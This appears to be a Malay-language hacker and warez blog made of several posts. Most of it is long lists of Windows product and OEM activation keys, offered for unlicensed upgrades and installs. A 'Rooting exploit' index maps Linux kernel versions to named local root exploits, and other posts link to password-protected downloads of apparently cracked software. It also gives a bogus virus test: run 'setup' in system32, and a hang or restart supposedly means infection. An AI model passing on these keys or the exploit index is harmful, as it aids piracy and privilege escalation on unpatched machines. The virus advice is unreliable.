Sunday, 26 February 2012

Windows Anytime Upgrade code

Salam kpda warga Silent Hacker sekalian ni first time aku open thread so kalo aku slah parking admin atau mod bleh remove ke section yg btul yer..hihihihihiSerial Key ini digunakan untuk upgrade contohnya windows 7 Starter nak upgrade ke Windows 7 Ultimate.Hanya untuk Windows 7 sahaja.

Masokkan serial key ikot jenama laptopStart--> Windows Anytime Upgrade --> Input Key --> wait --> done..

STARTER(OEM-8992752) (OEM-8992707)=================​====

RDJXR-3M32B-FJT32-QMPGB-GCFF6 --- XXXXX-OEM-8992752-30004 --- ACER/GATEWAY/​PACKARD6K6WB-X73TD-KG794-FJYHG-​YCJVG --- XXXXX-OEM-8992752-30005 --- ASUS (Eee)6PB94-MC2C6-4F37H-KTJ32-P​F2PT --- XXXXX-OEM-8992707-00097 --- CASPERERA36Q3Y-BBT84-MGJ3H-FT7​VD-FG72J --- XXXXX-OEM-8992707-00082 --- DELL4FRH4-WQDGJ-M9HRY-K73D8-RG​T3C --- XXXXX-OEM-8992707-00228 --- EXPERRH98C-M9PW4-6DHR7-X99PJ-3​FGDB --- XXXXX-OEM-8992752-30008 --- HPPMXH9-M23P9-QJJMB-2FWRC-7CDK​P --- XXXXX-OEM-8992752-30007 --- FUJITSU273P4-GQ8V6-97YYM-9YTHF​-DC2VP --- XXXXX-OEM-8992752-30169 --- LENOVO/​IBM22P26-HD8YH-RD96C-28R8J-DCT2​8 --- XXXXX-OEM-8992707-00153 --- LENOVO/​IBM2K8WH-JVQDM-C9HVC-YR2XC-8M76​G --- XXXXX-OEM-8992752-30065 --- MEDION2W4DJ-JFFJV-DMCPP-2C3X8-​883DP --- XXXXX-OEM-8992707-00121 --- MSI2YKPV-BFXFW-X8GJQ-9KQFF-KCX​GD --- XXXXX-OEM-8992752-30271 --- MSI2XGHP-9TQK2-8CF28-BM2P2-8FR​X8 --- XXXXX-OEM-8992752-30269 --- NOKIA344HQ-3YHDT-C7VCT-BDPBV-4​KTR3 --- XXXXX-OEM-8992707-00192 --- OLIDATAPV9BD-YBRX6-CTMG6-CCMJY​-X8XG7 --- XXXXX-OEM-8992752-30013 --- SAMSUNG32J2V-TGQCY-9QJXP-Q3FVT​-X8BQ7 --- XXXXX-OEM-8992707-00016 --- SONYTGBKB-9KBGJ-3Y3J6-K8M2F-J2​HJQ --- XXXXX-OEM-8992752-30015 --- TOSHIBA7W842-2HCPJ-BC3MJ-B79K6​-TD2HQ --- XXXXX-OEM-8992752-30214 --- VILIV32TF3-PT6YV-V6GCK-RR8GM-V​M4QG --- XXXXX-OEM-8992707-00180 --- ?????


HOME BASIC(OEM-8992752)============​=========

MB4HF-2Q8V3-W88WR-K7287-2H4CP --- XXXXX-OEM-8992752-50004 --- ACER/GATEWAY/​PACKARD89G97-VYHYT-Y6G8H-PJXV6-​77GQM --- XXXXX-OEM-8992752-50005 --- ASUS36T88-RT7C6-R38TQ-RV8M9-WW​TCY --- XXXXX-OEM-8992752-50258 --- DELL8W3JQ-BP2HY-F47QX-6CQ94-2B​KQB --- XXXXX-OEM-8992752-50007 --- FUJITSUDX8R9-BVCGB-PPKRR-8J7T4​-TJHTH --- XXXXX-OEM-8992752-50008 --- HP22MFQ-HDH7V-RBV79-QMVK9-PTMX​Q --- XXXXX-OEM-8992752-50213 --- LENOVO/​IBM2P6PB-G7YVY-W46VJ-BXJ36-PGGT​G --- XXXXX-OEM-8992752-50013 --- SAMSUNGYV7QQ-RCXQ9-KTBHC-YX3FG​-FKRW8 --- XXXXX-OEM-8992752-50014 --- SONY9DBMT-GXRWM-6Q9Y3-WMYM8-FJ​CBW --- XXXXX-OEM-8992752-50165 --- TONGFANG9H4FH-VD69Y-TGBD2-4PM4​K-DRMMH --- XXXXX-OEM-8992752-50015 --- TOSHIBA2TY7W-H4DD4-MB62F-BD9C3​-88TM6 --- XXXXX-OEM-8992752-50179 --- ?????2Q4QP-8P4MD-47YBP-7TXX9-F​KDRM --- XXXXX-OEM-8992752-50229 --- ?????


HOME PREM(OEM-8992687)=============​========VQB3X-Q3KP8-WJ2H8-R6B6​D-7QJB7 --- XXXXX-OEM-8992687-00006 --- ACER/GATEWAY/​PACKARD38JTJ-VBPFW-XFQDR-PJ794-​8447M --- XXXXX-OEM-8992687-00304 --- ADVENTV3Y2W-CMF9W-PGT9C-777KD-​32W74 --- XXXXX-OEM-8992687-00008 --- ALIENWARE2QDBX-9T8HR-2QWT6-HCQ​XJ-9YQTR --- XXXXX-OEM-8992687-00007 --- ASUS7JQWQ-K6KWQ-BJD6C-K3YVH-DV​QJG --- XXXXX-OEM-8992687-00118 --- ASUS (Eee)6RBBT-F8VPQ-QCPVQ-KHRB8-R​MV82 --- XXXXX-OEM-8992687-00095 --- DELL83K3W-QH8JT-T7KBY-9FQB6-V9​R8H --- XXXXX-OEM-8992687-00191 --- DELLC6MHH-TRRPT-74TDC-FHRMV-XB​88W --- XXXXX-OEM-8992687-00009 --- FUJITSU39QDH-D7MHH-WDMTD-TM2R9​-KM7DB --- XXXXX-OEM-8992687-00258 --- HCL4FG99-BC3HD-73CQT-WMF7J-3Q6​C9 --- XXXXX-OEM-8992687-00010 --- HP27GBM-Y4QQC-JKHXW-D9W83-FJQK​D --- XXXXX-OEM-8992687-00249 --- LENOVO/​IBM38GRR-KMG3D-BTP99-TC9G4-BBDJ​J --- XXXXX-OEM-8992687-00174 --- LG2P2P9-CM3F8-FTV6P-PC7CX-8TFF​7 --- XXXXX-OEM-8992687-00093 --- MEDION4G3GR-J6JDJ-D96PV-T9B9D-​M8X2Q --- XXXXX-OEM-8992687-00246 --- MSICQBVJ-9J697-PWB9R-4K7W4-2BT​4J --- XXXXX-OEM-8992687-00015 --- SAMSUNGHWDFB-YVFG4-3TJ7F-Q3WMT​-7B6PH --- XXXXX-OEM-8992687-00138 --- SIRAGONH4JWX-WHKWT-VGV87-C7XPK​-CGKHQ --- XXXXX-OEM-8992687-00016 --- SONY6B88K-KCCWY-4F8HK-M4P73-W8​DQG --- XXXXX-OEM-8992687-00057 --- TOSHIBA6GF36-P4HWR-BFF84-6GFC2​-BWX77 --- XXXXX-OEM-8992687-00017 --- TOSHIBAC23T3-9F2T2-FPWBM-XYMW2​-272J9 --- XXXXX-OEM-8992687-00143 --- VIEWSONIC2XPWB-Q64BJ-W8CT3-WJT​WT-4DQ99 --- XXXXX-OEM-8992687-00267 --- ?????TTJQ7-4PFJC-6JFJ8-B22VD-V​XW88 --- XXXXX-OEM-8992687-00013 --- ?????7K377-DVP2Q-YGWJG-3M3G7-R​BCDP --- XXXXX-OEM-8992687-00194 --- ?????3743C-T6892-B4PHM-JHFKY-4​BB7W --- XXXXX-OEM-8992687-00202 --- ?????

PROFESSIONAL(OEM-8992671)=====​================

YKHFT-KW986-GK4PY-FDWYH-7TP9F --- XXXXX-OEM-8992671-00004 --- ACER/GATEWAY/​PACKARD4CFBX-7HQ6R-3JYWF-72GXP-​4MV6W --- XXXXX-OEM-8992671-00188 --- ALIENWARE2WCJK-R8B4Y-CWRF2-TRJ​KB-PV9HW --- XXXXX-OEM-8992671-00407 --- ASUS32KD2-K9CTF-M3DJT-4J3WC-73​3WD --- XXXXX-OEM-8992671-00524 --- DELLPT9YK-BC2J9-WWYF9-R9DCR-QB​9CK --- XXXXX-OEM-8992671-00007 --- FUJITSU2QTV2-3CMPP-FQBYK-GRD62​-D7XMW --- XXXXX-OEM-8992671-00501 --- HCL74T2M-DKDBC-788W3-H689G-6P6​GT --- XXXXX-OEM-8992671-00008 --- HP32HPJ-4XRDR-424C8-DYQM9-GM76​8 --- XXXXX-OEM-8992671-00158 --- KRAFTWAY237XB-GDJ7B-MV8MH-98QJ​M-24367 --- XXXXX-OEM-8992671-00437 --- LENOVO/​IBM2QGXM-V9W9W-6Q7MR-64C4X-R26C​V --- XXXXX-OEM-8992671-00207 --- LG ?GMJQF-JC7VC-76HMH-M4RKY-V4HX6​ --- XXXXX-OEM-8992671-00013 --- SAMSUNGH9M26-6BXJP-XXFCY-7BR4V​-24X8J --- XXXXX-OEM-8992671-00014 --- SONY7RQGM-4BJBD-GM2YY-R2KTT-43​HG8 --- XXXXX-OEM-8992671-00282 --- STEG2V8P2-QKJWM-4THM3-74PDB-4P​2KH --- XXXXX-OEM-8992671-00137 --- TOSHIBA6JKVQ-WJTWW-JVPRB-77TGD​-2DV7M --- XXXXX-OEM-8992671-00339 --- WORTMANN2W3CX-YD4YJ-DF9B2-V27M​6-77GMF --- XXXXX-OEM-8992671-00503 --- ?????BV4Y4-DVXDT-3FC64-X2QR7-D​W82M --- XXXXX-OEM-8992671-00468 --- ?????6BJ27-DVBFF-VKQC8-7JPQP-T​JKYY --- XXXXX-OEM-8992671-00215 --- ?????6FWJ7-TDRCV-BYTP3-JWB98-9​J64J --- XXXXX-OEM-8992671-00211 --- ?????W2PMW-T7DBH-YHKRM-DXXF6-K​P4KT --- XXXXX-OEM-8992671-00015 --- ?????862R9-99CD6-DD6WM-GHDG2-Y​8M37 --- XXXXX-OEM-8992671-00205 --- ?????7QY32-TQCBJ-G7MC8-Y4PGF-7​TGB8 --- XXXXX-OEM-8992671-00284 --- ?????36KXM-JVMP6-88WMK-YCCGV-Y​FDVX --- XXXXX-OEM-8992671-00230 --- ?????CRYGF-JG347-QPJKH-BR82M-3​MQP3 --- XXXXX-OEM-8992671-00101 --- ?????


ULTIMATE(OEM-8992662)=========​============

FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 --- XXXXX-OEM-8992662-00006 --- ACER/GATEWAY/​PACKARDVQ3PY-VRX6D-CBG4J-8C6R2-​TCVBD --- XXXXX-OEM-8992662-00008 --- ALIENWARE2Y4WT-DHTBF-Q6MMK-KYK​6X-VKM6G --- XXXXX-OEM-8992662-00173 --- ASUS342DG-6YJR8-X92GV-V7DCV-P4​K27 --- XXXXX-OEM-8992662-00400 --- DELL9CW99-79BBF-D4M3X-9BK9M-4R​PH9 --- XXXXX-OEM-8992662-00009 --- FUJITSUMHFPT-8C8M2-V9488-FGM44​-2C9T3 --- XXXXX-OEM-8992662-00010 --- HP6K2KY-BFH24-PJW6W-9GK29-TMPW​P --- XXXXX-OEM-8992662-00537 --- LENOVO/​IBM (Re-released)49PB6-6BJ6Y-KHGCQ-7DDY6-T​F7CD --- XXXXX-OEM-8992662-00015 --- SAMSUNGYJJYR-666KV-8T4YH-KM9TB​-4PY2W --- XXXXX-OEM-8992662-00016 --- SONY2WX6M-X2HKM-86X8X-2QD44-F3​FGJ --- XXXXX-OEM-8992662-00481 --- ?????78FPJ-C8Q77-QV7B8-9MH3V-X​XBTK --- XXXXX-OEM-8992662-00366 --- ?????

Rooting exploit :

2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Anti Crash 3.61



Your computer always hang?
if right, you use this software yeah..
 download

password = blog-ayie.com

Virtual.DJ.Pro.7.0.4.364






Virtual.DJ.Pro.7.0.4.364

If you want to be like a DJ-Blend, you can use this software

Download it here

Password = blog-ayie.com

DNS Speeder


  • If you want to speed your DNS, you can try this software name DNS SPEEDER

     download
    Pass = blog-ayie.com


  • TrendMicro Titanium + 2012

    ok kt sini ako nk ajo korg dapat serial key untuk antivirus
    TrendMicro Titanium + 2012 n mendownload tnpe....berbayar


    Untuk mendapatkan antivirus tersebut,ikut langkah-langkah berikut :
    ... 1.Kunjungi halaman ini,lihat ke bawah ada tombol yang bertuliskan "Download Now" kemudian klik.
    Link : http://www.trendmicro.eu/​brother/EN/GBP/

    2.Masukkan data lengkap anda,lalu klik "submit my order"
    3.Klik submit

    4.Kemudian,anda mendapatkan AntiVirus TrendMicro Titanium + 2012 Genuine Yang Bagus

    komputer kita terkena virus atau tidak


    Berikut ini adalah cara melacak apakah komputer kita terkena virus atau tidak.

    1. Buka command prompt dengan cara Start -> Run -> cmd.
    Secara default, lokasi akan berada di C:\Documents and settings\nama_user, untuk itu anda harus pindah terlebih dahulu ke folder system32.

    ... 2. Ketikkan "cd c:\Win\system32" (tanpa tanda petik).
    Tekan enter untuk masuk ke folder system32.

    3. Ketik "setup" lalu tekan enter

    4. Jika muncul tampilan gambar yang didalamnya ada peringatan "Please go to the Control Panel to install and configure system components." Berarti komputer anda sehat dari virus, tetapi jika komputer anda malah hang atau restart itu berarti ada virus yang bersemayam di komputer anda.

    Lantas bagaimana jika komputer terdeteksi ada virusnya? Coba baca dulu cara membasmi virus brontok , secara garis besar caranya hampir sama seperti itu. Agar pengetahuan tentang virus lebih mendalam silahkan baca juga artikel tentang karakteristik umum virus.

    Dari 2 referensi artikel di atas, secara umum langkah mudah penanganan komputer yang terkena virus adalah dengan melakukan scanning system dengan antivirus update. Tapi yang perlu diingat sebelum melakukan scanning dengan antivirus ada baiknya matikan dulu system restore-nya dan akan lebih bagus lagi jika proses scanning berjalan di atas safe mode.

    Cara masuk ke safe mode->
    1. Restart PC
    2. Saat awal booting tekan tombol F8
    3. Jika langkah nomer 3 benar, akan keluar menu pilihan untuk masuk ke safe mode.
    4. Pilih menu safe mode dan tekan enter untuk mengeksekusi
    5. Tunggu hingga tampilan desktop muncul

    Setting IDM

    Setting IDM
    1. klik IDM
    2. klik Option
    3. Pada Connection/ Speed, pilih Other, dan pada Default Max conn.number pilih 16
    4. Tutup IDM
    ... 5. Jalankan Regedit>HKCU>Software>Download​ Manager> (lihat jendela kanan) Connection Speed>double click>pilih decimal> isi dengan 9999999999999>OK
    6. tutup regedit

    Finish

    iFree Recorder

    iFree Recorder is a easy-to-use tool for recording Skype voice conversations. It can record Skype2Skype calls, SkypeOut/SkypeIn calls, Conference calls. Once activate iFree recorder, Skype user can adjust Skype Call Recording option either choosing record both sides conversation, only record my side or Only record remote side. Plus more, Skype user even can adjust Skype voice recording audio mode ...and audio bitrate too.



    iFree Recorder has following features :


    Automatic or manual recording capabilities.


    Can be used to record Skype2Skype calls, SkypeOut/SkypeIn calls, Conference calls.


    Can Record both sides / Only record your side / Only record remote side


    Record your calls to MP3 format (Using Lame MP3 Encoder).


    Record history.


    Built-in audio player.


    Skype Recording Audio Quality Option:


    Recording Mode – It’s support Mono/Stereo/Joint Stereo Mode.


    Recording Bitrate – Choice of bitrates from 32 bits upto 256 bits.

    Recording Rate – Choice of rate from 16kHz upto 48kHz.

    download

    serial key all OS

    Kt sini ako nak shared serial key all OS...nie kebanyak windows2 baru ako lom jumpe lagi...yang banyk xp je la n vista...untuk change serial key korang boleh type :



    *KLIK START-RUN-(copy)-->>%systemroot%\system32\oobe\msoobe.exe /a



    lihat kt bawah nie




    Best Serial For win XP


    1. V2C47 - MK7JD - 3R89F - D2KXW - VPK3J


    2. H689T - BFM2F - R6GF8 - 9WPYM - B6378

    3. WCBG6 - 48773 - B4BYX - 73KJP - KM3K3




    Windows xp professional oem 2600.xpsp_sp2_rtm

    TG9QW-Q93XB-863WY-2KJ3X-F9HYG




    Windows Vista Ultimate 100% work

    DFSHT-TY83J-99KKS-FJHR3-RG971




    Microsoft - Windows Vista Ultimate


    6F2D7-2PCG6-YQQTB-FWK9V-932CC


    R8G6T-YBCXF-R29PG-9VFY3-FR9JB


    YFKBB-PQJJV-G996G-VWGXY-2V3X8


    368Y7-49YMQ-VRCTY-3V3RH-WRMG7

    2QBP3-289MF-9364X-37XGX-24W6P




    Windows XP Pro:


    3QM4M-868CW-WB6RQ-K6HP3-7C79J


    HRXTR-FKTCV-X8QCH-D7PTH-KYYPB


    M2GW6-HY6BX-3GFJR-3J27B-WFG7G


    WX367-2TFGP-2G8TF-CTBDW-R99X2


    HRXTR-FKTCV-X8QCH-D7PTH-KYYPB


    3QM4M-868CW-WB6RQ-K6HP3-7C79J


    8MFJK-WH8FJ-2VWVB-XKDCQ-3JM7W


    8V782-7YVMD-MW4P2-W63WT-V28JD


    D6DV7-68J8R-2647H-2VHFK-YV2HT


    T8T2H-7YGYF-PYFGM-XPXPT-XH3KG


    64DD4-2H3R7-TMXF7-7BRB8-GRWVB

    RDWM2-B4WCK-G2B7W-7GDM2-BTY4X




    Windows XP Home Edition:


    FHH8P-JYFX4-693YB-YCKVK-D36RJ


    4C4DQ-323QV-XBWTX-CX8YQ-3KJKM


    BQJG2-2MJT7-H7F6K-XW98B-4HQRQ


    VRWXX-QM4XW-J6R3P-8FK3W-V64FT


    PW6PT-TCGBR-HKTCT-GKKY6-QGK86


    XMCM6-DKYCQ-2BHQH-4PCHR-TBJCR


    JT42G-DDBCX-WTDMB-8WCT2-JGGH8


    VTYH4-P88R2-MW38B-Q62KT-48F7Y


    MT8JF-T82RK-R6C82-3YGHH-224PP

    XYRYX-XCG6K-W7PK8-2CTQQ-86DWR




    Windows 98 SE:


    R7KBF-TRQDX-XFRR4-GJ4GC-4H7YQ


    J3QQ4-H7H2V-2HCH4-M3HK8-6M8VW

    WMTVY-QVD98-GBB6G-Y9RWV-TY28Y




    Windows 98:


    WJXC4-BK4Y4-G4QJ8-F82FH-KHYTB


    D8B33-37942-FJHGR-WBKJ9-DFQT6

    B9Y34-DTDG9-97Y89-FVTKC-JKQFG




    Windows ME:


    QWVG4-4QY84-2XKFX-7DMQ6-RB6QQ


    FR286-CY66W-XJ8DG-VRCJY-2G4XD


    B6BYC-6T7C3-4PXRW-2XKWB-GYV33

    GRD3D-R3JF3-Y4J6D-X3QDK-T62XM




    Windows 2000 Professional:


    GYQ8K-H399V-QBJDT-R9VWP-BYX9M


    RBDC9 VTRC8 J79JY 7J972 PRVMG


    dmdjx-wkwdj-x8dm9-p3y9r-mqwfy


    DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM


    KM87H-X7QCV-DBV46-3J4HY-DKW46


    HB9CF-JTKJF-722HV-VPBRF-9VKVM

    GTH3Q-2MKP3-DPK7B-X4PB7-6X99J




    Windows 7 Beta 32-bit

    4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH




    Windows 7 Beta 64-bit

    JYDV8-H8VXG-74RPT-6BJPB-X42V4



    Windows 95 : CD-Key s/n: 875-7215850 or CD-Key s/n: 100-1208613 or CD-Key s/n: 757-2573155



    Windows 95 (build 490) : 100-1208613



    Windows 95 Advisor v1.0 for Win95 : s/n: 002-473 or s/n: 002-794 or s/n: 030-734 or s/n: 086-215



    Windows 95 CD-ROM Plus : CD-Key s/n: 040-0073635 or CD-Key s/n: 040-0081471 or CD-Key s/n: 040-0081586




    Windows 95 Final NL : 12095-OEM-0004226-12233

    Windows 95 Full Version : 15795-OEM-0001




    Windows 95 OEM Version : CD-Key: 12095-OEM-0004226-12233


    or 15795-OEM-0001355-07757

    or 16595-OEM-0001695-96524



    Windows 95 OSR 2.5 : CD Key: 24796-OEM-0014736-66386



    Windows 95 OSR 2.5 Addon : CD Key: 24796-OEM-0014736-66386



    Windows 95 plus pak : 28876-062-0805825003490



    Windows 95 v4.00.950 : 24264-425-4287696-06468



    Windows 95 v4.00.950 R2 : 875-7215850



    Windows 95 v4.00.950 R3/R6 : 975-4769754



    Windows 98 Build 1708 : CD-Key: BBH2G-D2VK9-QD4M9-F63XB-43C33




    Windows 98 : HGBRM-RBK3V-M9FXV-YCXDK-V38J4


    Windows 98 Upgrade : BMFGB-92WFM-GFDXD-FQGW6-WT47P


    Windows 98 OEM : FT9CH-XVXW7-7BFCM-RPR49-VDHYD


    Windows 98 Retail : F73WT-WHD3J-CD4VR-2GWKD-T38YD


    Windows 98 SE : HF928-QG627-23QDB-PY4YF-B8GMG

    Windows 98 SE OEM : FT9CH-XVXW7-7BFCM-RPR49-VDHYD




    Windows 2000 Professional : HRTHC-WWDF2-JQHRY-XK8X3-DTDW6


    Windows 2000 Pro : TQ4CV-XPJR3-KPG3Q-HGH74-BMYWT


    Windows 2000 Server : H6TWQ-TQQM8-HXJYG-D69F7-R84VM


    Windows 2000 Server : MQRJT-48J9R-36JXB-HJFCJ-TQXDQ


    Windows 2000 Adv Server : KRJQ8-RQ822-YRMXF-6TTXC-HD2VM

    Windows 2000 Advanced Server : JJRJJ-6Q7FV-D4W8V-MKT2Y-G499Q




    Windows 2003 : K4RBR-F3K42-M9RXG-48TPR-H6BPB


    Windows 2003 Server : JB88F-WT2Q3-DPXTT-Y8GH8-7YYQY

    Windows 2003 Web Server : 42X8-7MWXD-M4B76-MKYP7-CW9FD




    Windows ME:RBDC9-VTRC8-D7972-J97JY-PRVMG

    Windows Me Professional:975-4769754




    Windows NT 4.0:s/n: 227-075-455 cd key : 419-0201344


    Windows NT 4 Workstation OEM:34997-OEM-0028594-50108


    WINDOWS NT 4.0 SERVER 4.0:419-0104153


    Windows NT Workstation 4.0:s/n: 807-2414712 or

    OEMs/n: 28997-OEM-0025957-49297 or s/n: 425-1921701




    Windows XP Home: BJXGH-4TG7P-F9PRP-K6FJD-JQMPM


    Windows XP Home SP2: J76RR-MY44M-VTJ9T-6PMWX-FH88T


    Windows XP Professional: FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8


    Windows XP Professional SP2: P7WDR-H2CHK-X8V26-7TQTV-DRM4D


    Windows XP Corporate:TGRH7-K6QR3-RT6J4-V36FP-869HT


    Windows XP 64-Bit: b2rbk-7kpt9-4jpgx-qqfwm-pjdgg

    Windows XP Home OEM for Dell PC: FP2TC-MJ2CP-32J8T-FP3BY-RW6K6



    Windows XP Media Center 2005: C4BH3-P4J7W-9MT6X-PGKC8-J4JTM



    Windows XP Media Centre Edition 2005 QKRX4-WP7HT-YQMBW-GTDQD-7MY42



    Windows XP Media Centre Edition 2005: JJKB2-W3444-G8Q49-MH8R9-MD7PQ




    Windows XP Media Centre Edition 2005:


    JJKB2-W3444-G8Q49-MH8R9-MD7PQ


    C82GJ-YH627-72GBT-R7XV7-M7Y4B


    C4BH3-P4J7W-9MT6X-PGKC8-J4JTM


    RD6W4-369DT-DMHQH-4RVKW-WY6PG


    KCQ9Q-FTBM4-6HTWV-M7DKM-T4BFB


    QKRX4-WP7HT-YQMBW-GTDQD-7MY42

    C4BH3-P4J7W-9MT6X-PGKC8-J4JTM



    Windows LongHorn Professional : PTWG-M9PGK-2HT2J-JT9R9-6V8WM




    WINDOWS VISTA NEW KEYS :


    39935-FEA-8434699-41764


    34541-VPA-4524362-34887


    11537-BVX-4899342-16177


    57794-PCQ-7693684-15339


    17886-TPK-7595613-78928


    16514-NYY-7756842-96123


    58719-XGY-3927924-14286


    51434-HZC-8358458-91618


    34737-OGD-3733654-36986

    68352-ZOU-1148288-74989




    Windows Vista Ultimate Rtm Build 6.0.6000.16384 :


    GLAD2-SEEUH-AVEAS-ENSEO-FHUMR

    YFKBB-PQJJV-G996G-VWGXY-2V3X8




    Windows XP64

    M4676-2VW7F-6BCVH-9QPBF-QBRBM




    WINDOWS XP PRO SP2

    QW4HD-DQCRG-HM64M-6GJRK-8K3T




    Windows XP CDkey

    BKQW7-3JYTB-D26TX-DHPDM-3MTKG




    Windows Vista Ultimate 6,6000


    6F2D7-2PCG6-YQQTB-FWK9V-932CC


    2QBP3-289MF-9364X-37XGX-24W6P

    6P8XK-GDDTB-X9PJQ-PYF36-G8WGV




    Microsoft window vista ultimate 6.0 (build 6000)


    Name: Your name

    S/N: 89580-014-0000025-71487




    Microsoft Windows Vista Ultimate


    YFKBB-PQJJV-G996G-VWGXY-2V3X8


    VMCB9-FDRV6-6CDQM-RV23K-RP8F7


    GLAD2-SEEUH-AVEAS-ENSEO-FHUMR


    VMCB9-FDRV6-6CDQM-RV23K-RP8F7


    R8G6T-YBCXF-R29PG-9VFY3-FR9JB


    6F2D7-2PCG6-YQQTB-FWK9V-932CC

    2QBP3-289MF-9364X-37XGX-24W6P




    Microsoft Windows Vista Ultimate Final


    YFKBB-PQJJV-G996G-VWGXY-2V3X8

    PVYFQ-2JTBV-PKXQ2-FQHDY-MTBVH




    Microsoft Windows Vista Ultimate Final (activation)

    FBK3P-9HCG-YJGBB-CRVGV-X32M9




    Windows 7 Beta 32 Bit:

    6JKV2-QPB8H-RQ893-FW7TM-PBJ73




    windows 7.000 beta1


    JYDV8-H8VXG-74RPT-6BJPB-X42V4


    J7PYM-6X6FJ-QRKYT-TW4KF-BY7H9


    D67PP-QBKVV-6FWDJ-4K2XB-D4684

    HQDKC-F3P6D-C9YYM-HRB89-QDBB7




    Ok cukup dah,semoga bermanfaat buat anda semuanya serial tersebut diatas

    Terimakasih and salam



    hasil pencurian artikel yg bernama sipembawamaut

    Windows CD Key Finder


    Windows CD Key Finder

    WinKeyFinder 1.75 Released

    I'm pleased to announce the release of Winkeyfinder 1.75, this version fixes some of the issues encountered with x64 Office 2010 version.Win keyfinder retrieves your windows Xp, win 2000, windows me, 98, 2003 and .NET Product keys from the registry and display it for you.
    ...
    Usually the keys are encoded and stored in the registry it decodes it and also allows You to change Windows XP, 2003, and .Net Product Keys just press of a button. It is simple and easy to use.

    Here are some key features of "WinKeyFinder":

    · View/change XP Key
    · View Windows 7, Windows Vista 32bit and 64 bit Product/CD Keys.
    · View/Change MS office Key
    · View Win98 Key
    · view Win2000 Key
    · View .Net Key
    · View Win2003 Key
    · Check Activation Status (WinXP) / Coming soon Win 7/Vista
    · Save Your Product Key By Encrypting It
    · Generate Unique Passwords By Entering your Combination of KeyCode
    · Support for MS Office 2007 and 2010 32 bit OS, Soon 64 bit Office will be support,
    What's New in This Release:

    · Activation after a clean format problem has been solved now You can take backup of your Windows XP activation .
    Save your product keys more securely by encrypting them before they are saved so that it ads an extra layer protection on saved keys on your computer.

    The Latest Version of WinkeyFinder - 1.73 Final
    Which has the following new addition/support:
    Fixed x64 bit related issues
    Better Code written
    Some minor bugs fixed.
    Support for Windows 7 OS
    Support for x64 Bit Operating system
    Support for MS Office 2007, 2010 Beta (32 bit only)
    Removed Backup Activation and restore
    Removed many bugs which are too many to mention here

    u All Want need to download please go this link

    link :: http://www.winkeyfinder.com/

    Sunday, 12 February 2012

    "Merdeka Dengan Darah!"*


    (apologia buat Ahmad Boestamam)

    Darah siapa yang tumpah,
    darah siapa disumpah?
    Darah sesama saudara
    penjajah pecah perintah.

    Lihat jenazah Tok Janggut
    digantung tubuh terbalik
    diseret ke seluruh negeri
    digantung berhari-hari.

    Siapa jadi pengkhianat?
    Siapa engkau berkhidmat?
    Siapa jadi pembelot?
    Siapa si talibarut?

    Dan engkau masih berbangga,
    merdeka tak tumpah darah
    dan engkau masih memuja
    sejarah fitnah penjajah!

    Darah siapa yang tumpah,
    darah siapa disumpah?
    Darah sesama saudara
    penjajah pecah perintah.

    10/9/2011
    3.23 ptg/ kuala lumpur


    *sebuah puisi dengan judul pseudo, diangkat daripada Testamen Politik Angkatan Pemuda Insaf (API)

    sumber

    Wednesday, 8 February 2012

    H3X0R CREW DIBUBARKAN!

    Assalamualaiikum dan selamat sejahtera buat semua rakyat malaysia,tidak lupa jugak kepada yang sentiasa menyokong kezamx terrority dari dulu sehingga sekarang..

    H3xor crew merupakan crew hacker Malaysia...yang terkenal dengan slogan mereka"
    We Come In Peace , Hostility Is Not Our Way
    We Come In And Leave Peacefully
    Come in Peace, Strike For Freedom


    Apa yang ingin kezamx terrority bercerita disini..baru baru ini pihak kami mendapat khabar angin bahawa H3xor crew akan dibubarkan oleh kerana sebab sebab tertentu... so..pihak mydefacer cuba penghubungi pemangku h3xor crew..

    Apa yang dijelaskan oleh beliau..."
    selepas kejadian noobster menghilangkan diri di sebabkan dia songlap duit jadi admin2 DF membubarkan organisasi tidak sangka sye di pilih untuk menjadi pemangku hexor crew yg bru dan di sebabkan kuasa tersebut di berikan kepada saya jadi saya mengambil keputusna untuk membubarkan hexor crew.
    ini adalah untuk menjaga nama baik hexor crew serta ingin melupakan kemunculan hexor crew pada masa yang sama , ahli hexor crew boleh membawa haluan masing2 atau boleh mencuba nasib untuk menjadi ahli hexor crew admin2 hexor crew telah di serapkan untuk masuk ke dlm untuk pentadbiran DF. now pentadbiran hexor crew sudah di bubarkan.
    Dan hexor crew yang lain akan dibubarkan satu persatu."


    ~ maklumat dari pemangku H3xor crew

    Diharap apa yang dikongsikan disini dapat memberi jawapan kepada anda yang bertanya diuar sana :p

    Jika anda berminat dengan atau ingin menunjukan bakat anda, join kami di facebook: KLIK DISINI. -Kami tidak mempunyai apa-apa kaitan dengan perkara diatas,sekadar menyampaikan berita untuk pengetahuan anda terutama rakyat malaysia.

    Tuesday, 7 February 2012

    How to Fix/Remove “XeAyAl.eXE” Virus Worm Malware

    Couple days ago, one of my friend just borrowed my USB drive. When he returned it, I plugged my USB drive as usual to my laptop, and to my surprise, my Avast Anti Virus warned me that my USB drive was just infected by “XeAyAl.eXE” worm. I immediately remove the worm file through my antivirus, and performed full scan to my USB drive. I’m actually not sure what’s going to happen if my antivirus didn’t detect the worm and executed it.

